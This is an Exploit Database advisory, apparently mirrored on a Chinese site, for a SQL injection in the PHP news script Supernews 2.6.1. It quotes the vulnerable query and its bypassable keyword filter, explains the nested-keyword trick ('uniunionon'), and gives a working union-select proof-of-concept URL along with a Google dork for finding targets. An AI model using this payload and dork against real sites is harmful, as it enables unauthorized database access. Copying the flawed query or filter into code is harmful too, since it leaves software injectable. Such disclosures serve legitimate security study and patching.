Supernews 2.6.1 – ‘noticias.php?cat’ SQL Injection

• Exploit Database
• 35 阅读

• 作者： Yakir Wizman
  日期： 2012-05-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18961/

• ##########################################################################
  ## Supernews <= 2.6.1 (noticias.php cat) Remote SQL Injection
  ## Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
  ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
  ## Date: 31/05/2012
  ## Version: 2.6.1
  ## Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
  ## ISRAEL
  ##########################################################################
  ##Author will be not responsible for any damage.
  ##########################################################################
  ## Vulnerable Code - noticias.php [30-31]:
  30.	$idcategoria = formatDados($_GET['cat']);
  31.	$query = mysql_query("SELECT id, categoria FROM {$prefixdb}notcategorias WHERE id=$idcategoria ORDER BY categoria");
  
  ## NOTE:
  ## As you can see there is filter to variable $idcategoria.
  
  ## Function code - funcao.php [106-112]:
  106.function formatDados($data) { 
  107.	$data = strip_tags($data);
  108.	$data = trim($data);
  109.	$data = get_magic_quotes_gpc() == 0 ? addslashes($data) : $data;
  110.	$data = preg_replace("@(--|\#|\*|;|select|union|drop|insert|delete|xp_|\=| or |-shutdown|update| and |&|')@s", "", $data);
  111.	return $data;
  112.}
  
  ## As you can see, this function can be bypassed easily by the following example:
  # string 'uniunionon' will replace to clean 'union'
  # string 'seleselectct' will replace to clean 'select'
  
  ## SQL Injection PoC:
  ## http://www.example.com/noticias.php?cat=-1+uniunionon+seleselectct+1,version()--
  ##########################################################################
  # Cya :)
  # 0x31337.net
  ##########################################################################